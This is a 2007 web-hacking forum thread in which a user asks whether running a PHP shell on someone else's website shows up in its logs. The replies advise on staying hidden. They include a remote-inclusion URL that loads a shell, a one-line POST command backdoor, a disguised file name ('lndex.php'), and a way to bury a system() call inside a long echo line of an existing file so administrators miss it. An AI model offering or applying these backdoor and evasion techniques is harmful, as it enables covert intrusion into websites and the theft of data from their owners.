Donate to us via Paypal!
Your life is ending one minute at a time. If you were to die tomorrow, what would you do today?
Tuesday, October 27, 2020
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 116
Guests Online: 115
Members Online: 1

Registered Members: 129433
Newest Member: jessievd69
Latest Articles

View Thread

HellBound Hackers | Computer General | Web hacking

Author

PHP Shell Question...

Zer0Man
Member



Posts: 194
Location: England, UK
Joined: 02.01.07
Rank:
Moderate
Posted on 14-08-07 22:28
Hey all,
If I was to use a PHP Shell on a website does anything show up in the websites logs, for example where the PHP Shell is being hosted?


Thanks in advance,
Zer0Man


Social engineering bypasses all technologies, including firewalls. (Kevin Mitnick)
The true computer hackers follow a certain set of ethics that forbids them to profit or cause harm from their activities. (Kevin Mitnick)
Author

RE: PHP Shell Question...


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 14-08-07 22:30
Well if you upload a shell onto their site, it will log the fact that your IP accessed the page (along with all the GET vars, which will look really suspicious).

EDIT: The location of a remote shell will still be logged, like /index.php?page=http://site.com/shell.txt




Edited by on 14-08-07 22:33
Author

RE: PHP Shell Question...


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 17-08-07 12:07
to reduce the amount of logs, u can try to include a script which backdoor another php script on the site. I mean like:

<?php system($_POST['cmd']) ?>

or something,

then u can call the script with the post parameters, and these normally dont get logged (only that they are a post request not what was posted).

Then u only have one log of including the script which writed it to a script.

(hope i was clear )Pfft
Author

RE: PHP Shell Question...

Mr_Cheese
Member



Posts: 2468
Location: Brighton, UK
Joined: 30.11.04
Rank:
Uber Elite
Posted on 17-08-07 12:35
as mentioned above, if your shell uses GET variables which all public shells do... then yes they will easily be found and detected in logs.. along with your IP.

if your shell uses POST, then all that will be logged is: shell.php and your IP. but if you call the shell ... "company.php" or "lndex.php" (small L).. then it wont be so suspisous and likely to go unnoticed.. unless ofcourse the site the shell is on uses custom coded virus/shell scanners... which to be honest is unlikely.


Author

RE: PHP Shell Question...


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 23-08-07 03:03
Mr_Cheese wrote:
as mentioned above, if your shell uses GET variables which all public shells do... then yes they will easily be found and detected in logs.. along with your IP.

if your shell uses POST, then all that will be logged is: shell.php and your IP. but if you call the shell ... "company.php" or "lndex.php" (small L).. then it wont be so suspisous and likely to go unnoticed.. unless ofcourse the site the shell is on uses custom coded virus/shell scanners... which to be honest is unlikely.


unlikely, but not unheard of. It's common for sys admins to create programs that will alert them if the user that apache runs on runs any commands that aren't whitelisted. And, it's possible to log POST variables, just not practical. Something to keep in mind.

Better than creating a new file (lindex.php), which works (and that's a good file name, btw), it's probably better to edit an existing file you know never gets updated. To do this, check out the 'last updated' date (tools->page info, there's a javascript function, but I'm too lazy to look it up) and use common sense. For example, here I would go with exclusive membership, tshirts, or something similar. Then pick and inconspicuous place for the shell. For example,
echo "Assume that this line is longer than 80 characters (standard terminal size"; if($_POST['cmd']) system($_POST['cmd']); echo "
And the echo command continues here
And here";

And way, the web master doesn't see a new file he knows doesn't exist, but doesn't find you shell until your done with it because you will have already used the shell to gain access to a better account or to get the data you need before he updates that file.